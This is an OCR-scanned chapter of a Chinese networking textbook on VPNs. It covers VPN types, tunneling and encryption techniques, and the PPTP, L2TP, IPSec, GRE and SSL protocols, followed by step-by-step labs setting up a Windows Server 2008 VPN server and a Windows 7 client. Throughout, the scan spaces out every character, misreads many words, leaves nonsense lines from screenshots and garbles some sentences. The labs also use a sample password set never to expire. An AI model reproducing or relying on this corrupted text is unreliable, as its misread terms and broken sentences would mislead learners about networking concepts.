(5) VPN 设备 对 加 密 后 的 数据 ,鉴别 包 以 及 源 IP 地 址 .目标 VPN 设备 IP 地 址 进行 重 
新 封装 ,重新 封装 后 的 数据 包 通 过 虚拟 通道 在 公 网 上 传输 。 

(6) 当 数据 包 到 达 目 标 VPN 设备 时 ,数据 包 被 解 封装 ,数字 签名 被 核对 无 误 后 ,数据 包 
被 解密 。 


9.3.4 VPN 的 分 类 


VPN 按照 服务 类 型 可 以 分 为 企业 内 部 虚拟 网 (Intranet VPN)、 企 业 扩 展 虚 拟 网 
(Extranet VPN) 和 远程 访问 虚拟 网 (Access VPN) 这 3 种 类 型 。 

(1) 企业 内 部 虚拟 网 又 称 内 联网 VPN, 它 是 企业 的 总 部 与 分 支 机 构 之 间 通 过 公用 网 络 
构建 的 虚拟 专用 网 。 这 是 一 种 网 络 到 网 络 的 以 对 等 方式 连接 起 来 所 组 成 的 VPN。Intranet 
VPN 的 安全 性 取决 于 两 个 VPN 服务 器 之 间 的 加 密 和 验证 手段 。 图 9-3 是 一 个 典型 的 
Intranet VPN 。 






S sj 
总 部 LAN VPN 服 务 器 ”路 由 器 路 由 器 ”VPN 服 务 器 。 分 支 机构 LAN 
图 9-3 Intranet VPN 
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(2) 企业 扩展 虚拟 网 又 称 外 联网 VPN, 它 是 企业 间 发 生 收 购 、 兼 并 或 企业 间 建 立 战略 

联盟 后 ,使 不 同 企业 网 通过 公用 网 络 来 构建 的 虚拟 专用 网 ,如 图 9-4 所 示 。 它 能 保证 包括 

TCP 和 UDP 服务 在 内 的 各 种 应 用 服务 的 安全 ,如 HTTP、FTP、E-mail、 数 据 库 的 安全 以 及 
一 些 应 用 程序 ,如 Java、ActiveX 的 安全 等 。 





Internet 





总 部 LAN VPN 服 务 器 ”防火墙 防火 墙 。 VPN 服 务 器 ”合作 伙伴 LAN 
图 9-4 Extranet VPN 


通常 把 Intranet VPN 和 Extranet VPN 统一 称 为 专线 VPN。 

(3) 远程 访问 虚拟 网 又 称 拨号 VPN ,是 指 企业 员工 或 企业 的 小 分 支 机 构 通 过 公用 网 络 
远程 拨号 的 方式 构建 的 虚拟 专用 网 。 典 型 的 远程 访问 VPN 是 用 户 通过 本 地 的 因特网 服务 
提供 商 (ISP) 登 录 到 因特网 上 ,并 在 现 有 的 办 公 室 和 公司 内 部 网 之 间 建 立 一 条 加 密 信道 ,如 
图 9-5 所 示 。 





总 部 LAN VPN 服 务 器 ”防火 墙 移动 用 户 
图 9-5 Access VPN 


公司 往往 制定 一 种 “透明 的 访问 策略 ”, 即 使 在 远 处 的 员工 也 能 像 他们 坐 在 公司 总 部 的 
公 室 一 样 自 由 地 访问 公司 的 资源 。 为 方便 公司 员工 的 使 用 ,远程 访问 VPN 的 客户 端 应 
edge 


9.3.5 VPN 的 关键 技术 


目前 ,VPN 主要 采用 4 项 关键 技术 来 保证 安全 ,这 4 项 关键 技术 分 别 是 隧道 技术 
(tunneling) 加 解密 技术 、 密 钥 管理 技术 .用户 与 设备 身份 认证 技术 。 

1. 隧道 技术 

VPN 是 在 公共 网 络 中 形成 企业 专用 的 链 路 ,为 了 形成 这 样 的 链 路 ,采用 了 所 谓 的 “ 隧 
道 ” 技 术 。 隧 道 技 术 是 VPN 的 基本 技术 , 它 是 数据 包 封装 的 技术 ,可 以 模仿 点 对 点 连接 技 
术 , 依 靠 Internet 服务 提供 商 (ISP) 和 其 他 的 网 络 服 务 提供 商 (NSP) 在 公用 网 中 建立 自己 专 
用 的 “隧道 ”, 让 数据 包 通 过 这 条 隧道 传输 。 
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隧道 技术 是 一 种 通过 使 用 互联 网 络 的 基础 设施 在 网 络 之 间 传 递 数 据 的 方法 。 使 用 隧道 
传递 的 数据 可 以 是 其 他 协议 的 数据 帧 或 数据 包 。 隧 道 协议 将 其 他 协议 的 数据 帧 或 数据 包 重 
新 封装 到 一 个 新 的 IP 数据 包 的 数据 体 中 .然后 通过 隧道 发 送 。 新 的 IP 数据 包 的 报头 提供 
路 由 信息 ,以 便 通过 互联 网 传递 被 封装 的 负载 数据 。 当 新 的 IP 数据 包 到 达 隧 道 终 点 时 ,该 
新 的 IP 数据 包 被 解除 封装 。 

2. 加 解密 技术 

发 送 者 在 发 送 数据 之 前 对 数据 进行 加 密 , 当 数据 到 达 接收 者 时 由 接收 者 对 数据 进行 解 
密 。 加 密 算 法 主要 包括 对 称 加 密 ( 单 钥 加 密 ) 算 法 和 不 对 称 加 密 ( 双 钥 加 密 ) 算 法 。 对 于 对 称 
加 密 算 法 ,通信 双方 共享 一 个 密 钥 ,发 送 方 使 用 该 密 钥 将 明文 加 密 成 密 文 ,接收 方 使 用 相同 
的 密 钥 将 密 文 还 原 成 明文 。 对 称 加 密 算法 运算 速度 较 快 。 

不 对 称 加 密 算 法 是 通信 双方 各 使 用 两 个 不 同 的 密 钥 ,一 个 是 只 有 发 送 方 自 己 知道 的 密 
钥 ( 私 钥 , 秘 密 密 钥 ) ; 另 一 个 则 是 与 之 对 应 的 可 以 公开 的 密 钥 ( 公 钥 )。 在 通信 过 程 中 ,发 送 
方 用 接收 方 的 公开 密 钥 加 密 数 据 , 可 以 用 发 送 方 的 私 钥 对 数据 的 某 一 部 分 或 全 部 加 密 , 并 进 
行 数字 签名 。 接 收 方 接收 到 加 密 数 据 后 ,用 自己 的 私 钥 解密 数据 ,并 使 用 发 送 方 的 公开 密 钥 
解密 数字 签名 ,验证 发 送 方 身 份 。 

3. 密 钥 管理 技术 

密 钥 管理 技术 的 主要 任务 是 使 密 钥 在 公用 网 络 上 安全 地 传递 而 不 被 窃取 。 现 行 密 钥 管 
理 技术 可 分 为 SKIP 与 ISAKMP/OAKLEY 两 种 。 

SKIP 主要 是 利用 Diffie-Hellman 的 演算 法 则 在 网 络 上 传输 密 钥 ;在 ISAKMP 中 ,双方 
都 有 两 把 密 钥 ,分别 作为 公 铀 和 私 钥 。 

4. 用 户 与 设备 身份 认证 技术 

用 户 与 设备 身份 认证 技术 中 ,最 常用 的 是 用 户 名 /口令 ,智能 卡 认证 等 认证 技术 。 














9.3.6 VPN 隧道 协议 


VPN 隧道 协议 主要 分 为 第 二 、 第 三 层 隧道 协议 。 它 们 的 本 质 区 别 在 于 用 户 的 数据 是 被 
封装 在 不 同 层 的 数据 包 中 在 隧道 里 传输 。 第 二 层 隧道 协议 是 先 把 各 种 网 络 协议 封装 到 
PPP( 点 对 点 协议 ) 中 ,再 把 整个 数据 包装 入 隧道 协议 中 。 这 种 双 层 封装 方法 形成 的 数据 包 
靠 第 二 层 协 议 进行 传输 。 第 二 层 隧道 协议 有 L2F、PPTP、L2TP 等 。 第 三 层 隧道 协议 是 把 
各 种 网 络 协议 直接 装 入 隧道 协议 中 ,形成 的 数据 包 依 靠 第 三 层 协 议 进行 传输 。 第 三 层 隧道 
协议 有 IPSec、GRE 等 。 

(1) PPTP( 点 到 点 隧道 协议 )。PPTP 是 由 微软 公司 设计 的 ,用 于 将 PPP 分 组 通过 IP 
网 络 进行 封装 传输 。 设 计 PPTP 协议 的 目的 是 满足 公司 内 部 职员 异地 办 公 的 需要 。PPTP 
协议 定义 了 一 种 PPP 分 组 的 封装 机 制 , 它 通过 使 用 扩展 的 通用 路 由 封装 协议 GRE 进行 封 
装 , 使 PPP 分 组 在 IP 网 络 上 进行 传输 。 它 在 逻辑 上 延伸 了 PPP 会 话 ,从 而 形成 了 虚拟 的 远 
程 拨号 。 

(2) L2F( 第 二 层 转 发 )。L2F 是 由 Cisco 公司 提出 的 ,可 以 在 多 种 公共 网 络 设施 (如 
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ATM. 帧 中 继 、IP 网 络 ) 上 建立 多 协议 的 安全 虚拟 专用 网 。 它 将 链 路 层 的 协议 (如 PPP、 
HDLC 等 ) 封 装 起 来 传送 ,因此 网 络 的 链 路 层 完全 独立 于 用 户 的 链 路 层 协议 。 

(3) L2TP( 第 二 层 隧道 协议 )。L2TP 结合 了 PPTP 协议 和 L2F 协议 的 优点 ,以 便 扩 展 
功能 。 其 格式 基于 L2F, 信 令 基 于 PPTP。 这 种 协议 几乎 能 实现 PPTP 和 L2F 协议 能 实现 
的 所 有 服务 ,并 且 更 加 强大 、 灵 活 。 它 定义 了 利用 公共 网 络 设施 (如 ATM、 帧 中 继 、IP 网 络 ) 
封装 传输 链 路 层 PPP 帧 的 方法 。 

(4) IPSec(IP 安全 )。IPSec 是 在 网 络 层 提供 通信 安全 的 一 组 协议 。 在 IPSec 协议 族 
中 ,有 两 个 主要 的 协议 : 认证 报头 (authentication header, AH) 协 议和 封装 安全 负载 
(encapsulating security payload,ESP) 协 议 。 

对 于 AH 和 ESP 协议 , 源 主机 在 向 目的 主机 发 送 安 全 数据 报 之 前 , 源 主机 和 目的 主机 
进行 握手 ,并 建立 一 个 网 络 层 迎 辑 连接 ,这 个 迎 辑 连接 称 为 安全 关联 (security association， 
SA)。SA 是 两 个 端点 之 间 的 单 向 连接 , 它 有 一 个 与 之 关联 的 安全 标识 符 。 如 果 需 要 使 用 双 
向 的 安全 通信 , 则 要 求 使 用 两 个 安全 关联 。 

AH 协议 : 在 发 送 数据 包 时 ,AH 报头 插 在 原 有 IP 报 文 头 和 TCP 报 文 头 之 间 。 在 IP 
报头 的 协议 类 型 字段 , 值 51 用 来 表明 数据 包 包 含 AH 报头 。 当 目的 主机 接收 到 带 有 AH 
报头 的 IP 数据 报 后 , 它 确定 数据 报 的 SA, 并 验证 数据 报 的 完整 性 。AH 协议 提供 了 身份 认 
证 和 数据 完整 性 校 验 功能 ,但 是 没有 提供 数据 加 密 功能 。 

ESP 协议 : 采用 ESP 协议 , 源 主机 可 以 向 目的 主机 发 送 安 全 数据 报 。 安 全 数据 报 是 
用 ESP 报头 和 ESP 报 尾 来 封装 原来 的 IP 数 据 报 ,然后 将 封装 后 的 数据 插入 到 一 个 新 了 
数据 报 的 数据 字段 。 对 于 这 个 新 IP 数据 报 的 报头 中 的 协议 类 型 字段 , 值 50 用 来 表示 数 
据 报 包含 ESP 报头 和 ESP 报 尾 。ESP 协议 提供 了 身份 认证 .数据 完整 性 校 验 和 数据 加 密 
功能 。 

(5) GRE(general routing encapsulation ,通用 路 由 封装 )。GRE 规定 了 怎样 用 一 种 网 
络 层 协议 去 封装 另 一 种 网 络 层 协议 的 方法 。GRE 的 隧道 由 两 端的 源 IP 地 址 和 目的 IP 地 
址 来 定义 。GRE 只 提供 了 数据 包 的 封装 , 它 并 没有 加 密 功 能 来 防止 网 络 侦 听 和 攻击 。 所 
以 ,在 实际 环境 中 它 常 和 IPSec 一 起 使 用 .由 IPSec 提供 用 户 数据 的 加 密 , 从 而 给 用 户 提供 
更 好 的 安全 性 。 

(6) SSL(security socket layer, 安全 套 接 层 )。SSL 是 由 Netscape 公司 开发 的 一 套 
Internet 数据 安全 协议 ,SSL 内 艇 在 下 等 浏览 器 中 。 它 已 被 广泛 地 用 于 Web 浏览 器 与 服 
务 器 之 间 的 身份 认证 和 加 密 数 据 传 输 。SSL 协议 位 于 传输 层 和 应 用 层 之 间 的 一 个 新 层 , 它 
接受 来 自 浏览 器 的 请 求 , 再 将 请 求 转送 给 TCP 以 便 传输 到 服务 器 上 。 在 SSL 之 上 使 用 的 
HTTP 被 称 为 HTTPS( 安 全 的 HTTP, 使 用 443 端口 ,而 非 80 端口 )。SSL 包括 两 个 子 协 
议 : SSL 记录 协议 和 SSL 握手 协议 。SSL 记录 协议 建立 在 可 靠 的 传输 协议 (如 TCP) 之 上 ， 
为 高 层 协议 提供 数据 封装 .压缩 `, 加 密 等 基本 功能 的 支持 。SSL 握手 协议 建立 在 SSL 记录 
协议 之 上 ,用 于 在 实际 的 数据 传输 开始 前 ,通信 双方 进行 身份 认证 、 协 商 加 密 算法 ,交换 加 密 
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94 项 目 实 施 


9.4.1 任务 1: 在 Windows Server 2008 上 部 署 VPN 服务 器 


1. 任务 目标 

在 Windows Server 2008 上 部 署 VPN 服务 器 ,使 VPN 客户 机 能 够 通过 VPN 连接 到 
VPN 服务 器 ,能 访问 服务 器 指定 的 内 容 。 

2. 任务 内 容 

(1) 硬件 连接 。 

(2) TCP/IP 协议 配置 。 

(3) 安装 “路 由 和 远程 访问 服务 ”角色 服务 。 

(4) 配置 并 启用 路 由 和 远程 访问 。 

(5) 创建 VPN 接 入 用 户 。 

3. 完成 任务 所 需 的 设备 和 软件 

(1) Windows Server 2008 双 网 卡 服 务 器 1 台 。 

(2) Window 7 客户 机 1 台 。 

(3) 交换 机 1 台 。 

(4) 直通 网 线 2 根 。 

4. 网 络 拓扑 结构 

为 了 完成 本 次 实 训 任务 ,搭建 如 图 9-6 所 
示 的 网 络 拓扑 结构 。 





5. 任务 实施 步骤 
1) 硬件 连接 
用 两 根 直通 双 绞 线 分 别 把 服务 器 (连接 外 服务 器 
网 的 网 卡 ) 和 客户 机 连接 到 交换 机 上 。 图 9-6 网 络 拓扑 结构 


2) TCP/IP 协议 配置 

步骤 1: 配置 服务 器 连接 外 网 的 网 卡 1 的 IP 地 址 为 192. 168. 1. 10, 子 网 拖 码 为 
255. 255. 255.0, 连 接 内 网 的 网 卡 2 的 IP 地 址 为 192. 168. 3.10, 子 网 拖 码 为 255. 255. 255. 0; 
配置 客户 机 的 IP 地 址 为 192. 168. 1. 20, 子 网 扼 码 为 255. 255. 255. 0。 

步骤 2: 在 服务 器 和 客户 机 之 间 用 ping 命令 测试 网 络 的 连通 性 。 

3) 安装 “路 由 和 远程 访问 服务 ”角色 服务 

“路 由 和 远程 访问 服务 ”角色 服务 包含 在 “网 络 策略 和 访问 服务 角色 中 。 

步骤 1: 在 Windows Server 2008 服务 器 上 ,选择 “开始 ”>“ 管 理工 具 ” 一 “服务 器 管理 
器 "命令 ,打开 “服务 器 管理 器 ”窗口 .选择 左 窗 格 中 的 “角色 ”选项 , 单 击 右 窗 格 中 的 “添加 角 
色 ” 链 接 。 

步骤 2: 在 打开 的 “添加 角色 向 导 ” 对 话 框 中 有 相关 说 明和 注意 事项 , 单 击 “ 下 一 步 ” 按 
钮 ,出 现 “ 选 择 服务 器 角色 ”界面 ,如 图 9-7 所 示 ,选中 “网 络 策略 和 访问 服务 ”" 复 选 框 。 
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[DD Active Directory Rights Nanagenent Services 


Windows Server Update Services 
口 Windows 部 署 服务 

口 传真 服务 闫 

辣 打印 和 文件 服务 





图 9-7 “选择 服务 器 角色 ”界面 


步骤 3: 单 击 “下 一 步 ?按钮 ,出 现 * 网 络 策略 和 访问 服务 ”界面 ,可 查看 网 络 策略 和 访问 
服务 简介 及 相关 注意 事项 ,如 图 9-8 所 示 。 


座 网 络 策略 和 访问 服务 





图 9-8 “网 络 策略 和 访问 服务 "界面 
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步骤 4: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 选 择 角色 服务 ”界面 ,选中 “路 由 和 远程 访问 服务 ” 复 
选 框 ,如 图 9-9 所 示 。 








9-9 “选择 角色 服务 ”界面 


步骤 5: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 确 认 安 装 选择 ”界面 ,确认 选择 的 角色 服务 无 误 后 单 
击 “ 安 装 ” 按 钮 ,如 图 9-10 所 示 , 安 装 完成 后 单 击 " 关 闭 ” 按 钮 。 


和 加 角色 向 导 





图 9-10 “确认 安装 选择 ”界面 
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4) 配置 并 启用 路 由 和 远程 访问 
步骤 1: 选择 “开始 ”>“ 管 理工 具 ”>“ 路 由 和 远程 访问 ”命令 ,打开 “路 由 和 远程 访问 " 窗 
口 , 如 图 9-11 所 示 。 
3 路 由 和 远程 访问 
文件 F) 操作 WW) 查看 W) 帮助 00 


FT lt ee 
[mo 














访问 ,请 在 “所作 ” 荣 单 上 单 击 “配置 并 启用 路 由 和 
Se spn, 请 参阅 中 由 
查看 W) 


肿 除 各) 
刷新 轩 ) 


属性 @) 
帮助 00 








图 9-11 “路 由 和 远程 访问 ”窗口 
步骤 2: 右 击 服务 器 (SERVER) ,在 弹出 的 快捷 菜单 中 选择 “配置 并 启用 路 由 和 远程 访 
问 ” 命 令 ,打开 * 路 由 和 远程 访问 服务 器 安装 向 导 ” 对 话 框 .如 图 9-12 所 示 。 


路 由 和 远程 访问 服务 器 安装 向 导 
欢迎 使 用 路 由 和 远程 访问 服务 器 安装 向 导 


ee 


单 击 “ 下 一 步 ”继续 。 








图 9-12 “路 由 和 远程 访问 服务 器 安装 向 导 ” 对 话 框 


步骤 3: 单 击 “ 下 一 步 " 按 钮 出现“ 配置 "界面 ,如 图 9-13 所 示 , 选 中 “远程 访问 (拨号 或 
VPN)" 单 选 按钮 。 

步骤 4: 单 击 “ 下 一 步 " 按 钮 ,出 现 “ 远 程 访问 "界面 .如 图 9-14 所 示 ,选中 VPN 复 选 框 。 

步骤 5: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “VPN 连接 ”界面 ,如 图 9-15 所 示 , 选 择 VPN 接 人 端 
口 ( 即 连 接 外 网 的 网 卡 ) ,在 这 里 选择 IP 地 址 为 192. 168. 1. 10 的 本 地 连接 。 
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路 由 和 运程 访问 服 


何以 用 下 下 服务 的 任意 组 会， 或 者 各 以 自 定义 此 服务 器。 





图 9-13 “配置 "界面 





路 由 和 远程 访问 慑 





图 9-14 “远程 访问 "界面 




















YPN 连接 
要 允许 VPN 客户 庙 连 接 到 此 服务 器 ， 至 少 要 有 一 个 网 络 接口 连接 到 


Interneto 


] 
EE i Er | 





9-15 “VPN 连接 ”界面 


项 目 9 VPN 技 术 
步骤 6: 单 击 * 下 一 步 "按钮 ,出 现 *IP 地 址 分 配 ” 界 面 ,选择 对 远程 客户 端 分 配 IP 地 址 
的 方法 ,这 里 选中 “来 自 一 个 指定 的 地 址 范围 " 单 选 按 钮 ,如 图 9-16 所 示 。 














图 9-16 “IP 地 址 分 配 ” 界 面 


步骤 7: 单 击 “ 下 一 步 " 按 钮 ,出 现 * 地 址 范围 分 配 ” 界 面 , 单 击 “ 新 建 "按钮 ,在 打开 的 “新 
建 IPv4 地 址 范围 ?对 话 框 中 ,设置 “起 始 IP 地 址 ”为 192. 168. 3. 100, “结束 IP 地 址 ”为 
192. 168. 3. 199 , 共 100 个 地 址 ,如 图 9-17 所 示 。 





新 建 IPv4 地 址 范围 














图 9-17 “新 建 IPv4 地 址 范围 ?对 话 框 


步骤 8: 单 击 “确定 ?按钮 ,返回 “地 址 范围 分 配 ? 界 面 。 再 单 击 * 下 一 步 ? 按 钮 ,出现 * 管 理 
多 个 远程 访问 服务 器 "界面 ,选中 “ 否 ,使 用 路 由 和 远程 访问 来 对 连接 请 求 进行 身份 验证 ”" 单 
选 按钮 ,如 图 9-18 所 示 。 

步骤 9: 单 击 * 下 一 步 ?按钮 ,再 单 击 * 完 成 ”按钮 ,出 现 如 图 9-19 所 示 的 对 话 框 ,表示 需 
要 配置 DHCP 中 继 代 理 程序 ,最 后 单 击 “ 确 定 ” 按 钮 即 可 。 
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路 由 和 远程 访问 服务 








图 9-18 “管理 多 个 远程 访问 服务 器 "界面 


EEEEEE 





图 9-19 DHCP 中 继 代理 信息 


至 此 ,路 由 和 远程 访问 建立 完成 。 

5) 创建 VPN 接 和 用户 

VPN 服务 配置 完成 后 ,还 需要 在 VPN 服务 器 上 创建 VPN 接 入 用 户 。 

步骤 1: 选择 “开始 ”>“ 管 理工 具 ”>“ 计 算 机 管理 ”命令 ,打开 “计算 机 管理 ”窗口 ,依次 
展开 “系统 工具 ”>“ 本 地 用 户 和 组 ”>“ 用 户 ” 选 项 ,在 右 窗 格 的 空白 处 右 击 , 在 弹出 的 快捷 菜 
单 中 选择 “新 用 户 ” 命 令 , 如 图 9-20 所 示 。 


计算 机 管理 





管理 计算 机 呈 ) 的 内 置 帐 户 
供 来 宾 访 问 计算 机 或 访问 | 坦 99 内 ， 





图 9-20 “计算 机 管理 ”窗口 
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步骤 2: 在 打开 的 “新 用 户 ” 对 话 框 中 输入 用 户 名 (VPNtest) 和 密码 (p@ssword1) ,并 选 
中 下 方 的 “用 户 不 能 更 改 密码 ”和 “密码 永 不 过 期 " 复 选 框 ,如 图 9-21 所 示 。 





test 

















图 9-21 “新 用 户 ” 对 话 框 


步 又 3: 单 击 “ 创 建 "按钮 ,再 单 击 “ 关 闭 ” 按 钮 ,完成 新 用 户 VPNtest 的 创建 。 
步骤 4: 在 “计算 机 管理 "窗口 的 右 侧 窗 格 中 , 右 击 刚 创建 的 新 用 户 VPNtest, 在 弹出 的 
快捷 菜单 中 选择 “属性 ”命令 ,打开 “VPNtest 属性 ”对 话 框 ,如 图 9-22 所 示 。 





图 9-22 设置 远程 访问 权限 为 “允许 访问 ” 


步骤 5: 在 “ 拨 入 "选项 卡 中 ,选中 “允许 访问 " 单 选 按 钮 后 , 单 击 “ 确 定 ” 按 钮 。 
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9.4.2 任务 2: 在 Windows 7 客户 端 建立 并 测试 VPN 连接 


1. 任务 目标 

能 正确 配置 VPN 客户 端 ,建立 并 测试 VPN 连接 。 

2. 任务 内 容 

(1) 设置 VPN 客户 端 。 

(2) 连接 到 VPN 服务 器 。 

(3) 验证 VPN 连接 。 

3. 任务 实施 步骤 

1) 设置 VPN 客户 端 

假设 客户 机 上 安装 有 Windows 7 操作 系统 。 

步骤 1: 在 客户 机 上 , 右 击 桌面 上 的 “网 络 ”" 图 标 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ， 
打开 “网 络 和 共享 中 心 ” 窗 口 , 如 图 9-23 所 示 。 





®© © EXILE TL “| 9 rmmg 0| 


新 的 连 扩 或 同 


设置 无 线 、 寓 沉 、 投 号 、 临 时 或 VPN 连接 ; 或 设置 路 由 器 或 沪 问 点 . 


等 连接 到 网 络 
有 线 、 拓 号 或 VPN 网 络 连 接 . 


吗 运 择 家 庭 给 和 共享 迁 项 
访问 位 于 其 他 网 络 计算 机 上 的 文件 和 打印 机 ,或 更 改 共享 设置 . 


国 ERe% 答 








9-23 “网 络 和 共享 中 心 ”窗口 


步骤 2: 单 击 “设置 新 的 连接 或 网 络 ” 链 接 , 打 开 * 设 置 连接 或 网 络 ? 对 话 框 ,如 图 9-24 所 
示 ,选择 “连接 到 工作 区 ?选项 。 

步骤 3: 单 击 “下 一 步 "按钮 ,出 现 * 您 想 如 何 连 接 ” 界 面 ,如 图 9-25 所 示 , 单 击 “ 使 用 我 的 
Internet 连接 (VPN)” 选 项 。 

步骤 4: 接着 出 现 “ 您 想 在 继续 之 前 设置 Internet 连接 吗 ? 界 面 . 在 该 界面 中 设置 
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选择 一 个 连接 选项 





连接 到 Internet 
设置 无 线 、 宽 市 或 所 号 连接 , 连接 到 Internet, 


加 
配置 新 的 路 由 器 或 访问 点 . 














图 9-24 “设置 连接 或 网 络 ” 对 话 框 








分 使 用 我 的 Internet 连接 (VPN)(1) 
通过 Internet 使 用 虚拟 专用 网 络 (VPN) 来 连接 


合 直接 拨号 (D) 
不 通过 Internet 直 接 使 用 电话 号 码 来 连接 。 


什么 旺 VPN 连 答 ? 








9-25 “您 想 如 何 连接 ”界面 


Internet 连接 ,由 于 本 实例 VPN 服务 器 和 VPN 客户 机 是 物理 直接 连接 在 一 起 的 ,所 以 单 击 
“我 将 稍 后 设置 Internet 连接 ”选项 ,如 图 9-26 所 示 。 

步骤 5: 接着 出 现 “ 键 入 要 连接 的 Internet 地 址 ”界面 ,如 图 9-27 所 示 , 在 “Internet 地 
址 ”文本 框 中 输入 VPN 服务 器 的 外 网 网 卡 IP 地 址 192. 168. 1. 10, 并 设置 “目标 名 称 ” 为 
“VPN 连接 ”。 

步骤 6: 单 击 * 下 一 步 "按钮 ,出现 * 键 和 人 您 的 用 户 名 和 密码 ”界面 ,如 图 9-28 所 示 ,输入 
用 户 名 (VPNtest) 和 密码 (p@sswordl) 。 
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您 想 在 继续 之 前 设置 Internet 连接 吗 ? 


需要 Internet 连接 才能 使 用 VPN 连接 . 


今 设置 Internet 连接 (S) 





键入 要 连接 的 Internet 地 址 


网 阁 管理 员 可 提供 此 地 址 . 





192.168.1.10 





VPN 连接 


加 使 用 智能 卡 (S) 


加 回 罗 许 其 他 人 使 用 此 连接 (A) 
这 个 过 项 允许 可 以 沪 问 这 台 计算 机 的 人 使 用 此 这 接 . 


国 现 在 不 连接 ; 仅 进行 设置 以 便 稀 后 连接 (D) 





9-27 “键入 要 连接 的 Internet 地 址 ”界面 


步骤 7: 单 击 “ 创 建 "按钮 ,出 现 “ 连 接 已 经 可 以 使 用 ”界面 ,如 图 9-29 所 示 , 单 击 “ 关 闭 ” 
按钮 ,完成 VPN 连接 的 创建 。 

2) 连接 到 VPN 服务 器 

步骤 1: 布 击 桌面 上 的 “网 络 ” 图 标 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,打开 “网 络 和 
共享 中 心 ”窗口 , 单 击 “ 更 改 适配器 设置 "链接 ,出 现 “ 网 络 连 接 ” 窗 口 ,如 图 9-30 所 示 。 

步骤 2: 双击 “VPN 连接 ”图标 (已 断 开 连接 ) ,打开 “连接 VPN 连接 ”对 话 框 ,如 图 9-31 
所 示 , 输 入 用 户 名 (VPNtest) 和 密码 (p@ssword1), 单 击 “ 连 接 ” 按 钮 ,经 过 身份 验证 后 即 可 
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图 9-28 “键入 您 的 用 户 名 和 密码 ”界面 


连接 已 经 可 以 使 用 





图 9-29 “连接 已 经 可 以 使 用 ”界面 


连接 到 VPN 服务 器 ,在 如 图 9-32 所 示 的 “网 络 连 接 " 窗 口中 可 以 看 到 “VPN 连接 ”的 状态 是 
连接 的 。 

3) 验证 VPN 连接 

当 VPN 客户 端 连接 到 VPN 服务 器 后 ,可 以 访问 内 网 中 的 共享 资源 。 

(1) 查看 VPN 客户 端 获取 到 的 IP 地 址 ,步骤 如 下 。 

步骤 1: 在 VPN 客户 端 计算 机 上 运行 ipconfig/all 命令 ,查看 IP 地 址 信息 ,如 图 9-33 
所 示 , 可 以 看 到 VPN 连接 获取 到 的 IP 地 址 为 192. 168. 3. 101。 
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VPN 连接 


WAN Miniport (PPTP) 








图 9-30 “网 络 连接 ”窗口 


用 户 名 0 。 YPNtest 





思 为 下 面 用 户 保存 用 户 名 和 密码 5) 
口 只 是 我 0 
国 避 任何 使 用 此 计算 机 的 人 内) 


CE [一 ] CEO-] Co 


9-31 “连接 VPN 连接 ”对 话 框 














Realtek pCle GBE Family Contr.. 








9-32 已 经 连接 到 VPN 服务 器 
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夯 管理 员 : C\Windows\system32\cemd.exe ex™| 













图 9-33 查看 VPN 连接 获取 到 的 IP 地 址 





步骤 2: 依次 输入 命令 ping 192. 168. 3. 10 和 ping 192. 168 


3. 20 ,测试 VPN 客户 端 计 
算 机 与 VPN 服务 器 以 及 内 网 计算 机 的 连通 性 ,如 图 9-34 所 示 ,显示 前 | 


能 连通 。 





夯 管理 员 : C\Windows\system32\cr 











图 9-34 测试 VPN 连接 


(2) 在 VPN 服务 器 上 进行 验证 ,步骤 如 下 

步骤 1: 在 VPN 服务 器 上 打开 “路 由 和 远程 访问 ”窗口 ,如 图 9-35 所 示 , 展 开 服务 器 
(SERVER) 节 点 , 单 击 “ 远 程 访问 客户 端 ” 选 项 ,在 右 侧 窗 格 中 显示 VPN 连接 时 间 以 及 连接 
的 账户 ,这 表明 已 经 有 一 个 客户 建立 了 VPN 连接 。 

步骤 2: 单 击 * 端 口 ? 选 项 ,在 右 侧 窗 格 中 可 以 看 到 其 中 一 个 端口 的 状态 是 “活动 ”, 如 
图 9-36 所 示 ,表明 有 客户 端 连接 到 VPN 服务 器 。 
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路 由 和 远程 访问 








路 由 和 远程 访问 


站 IISBlIgn 


网 络 接口 
远程 访问 客户 满 (1) 
饼 远程 访问 日 志和 策略 
图 IPv4 








图 9-36 查看 “端口 "状态 


步骤 3: 右 击 该 活动 端口 ,在 弹出 的 快捷 菜单 中 选择 “状态 ”命令 ,打开 “端口 状态 ”对 话 
框 ,如 图 9-37 所 示 ,在 该 对 话 框 中 显示 了 VPN 连接 的 持续 时 间 ,用户 以 及 分 配给 VPN 客户 
端 计算 机 的 IP 地 址 等 信息 。 








9-37 “端口 状态 ”对 话 框 
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(3) 访问 内 部 局 域 网 的 共享 文件 ,步骤 如 下 。 
步骤 1: 在 内 部 局 域 网 的 某 一 计算 机 (192. 168. 3. 20) 上 创建 FTP 用户 FTPuser 和 共 
享 文件 夹 Share, 并 人 允许 用 户 FTPuser 可 以 访问 共享 文件 夹 Share, 如 图 9-38 所 示 。 


选择 要 与 其 共享 的 用 户 


键入 名称， 然后 单 主 “ 添 加 ” ， 或 者 单 主 箭 头 查 拉 用 户 - 








名 称 
Administrator 
是 Administrators 
多 FTPuser 























图 9-38 ”允许 用 户 FTPuser 可 以 访问 共享 文件 夹 Share 


步骤 2: 在 VPN 客户 端 计算 机 上 选择 “开始 ”>“ 运 行 ”命令 ,输入 共享 文件 来 的 UNC 


路 径 “\\192.168. 3.20”, 输 入 FTP 用 户 名 (FTPuser) 和 密码 后 ,可 以 访问 内 部 局 域 网 中 的 
共享 文件 夹 Share, 如 图 9-39 所 示 。 


CE Rs ，192168320 ， [$s 二 1921683.. P| 














9-39 ”访问 内 部 局 域 网 中 的 共享 文件 夹 Share 


(4) 断 开 VPN 连接 ,步骤 如 下 。 


步骤 1: 在 VPN 服务 器 的 “路 由 和 远程 访问 ”窗口 中 .依次 展开 服务 器 (SERVER) 节 点 
和 “远程 访问 客户 端 (1) ”节点 ,在 右 侧 窗 格 中 显示 了 已 连接 的 VPN 连接 。 


步骤 2: 右 击 已 连接 的 VPN 连接 ,在 弹出 的 快捷 菜单 中 选择 “ 断 开 ” 命 令 , 即 可 断 开 客 
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户 端 计算 机 的 VPN 连接 。 也 可 以 在 VPN 客户 端 计算 机 的 “网 络 连 接 ” 窗 口中 右 击 *“VPN 
连接 ”图 标 ,在 弹出 的 快捷 菜单 中 选择 “ 断 开 ” 命 令 , 即 可 断 开 VPN 连接 。 


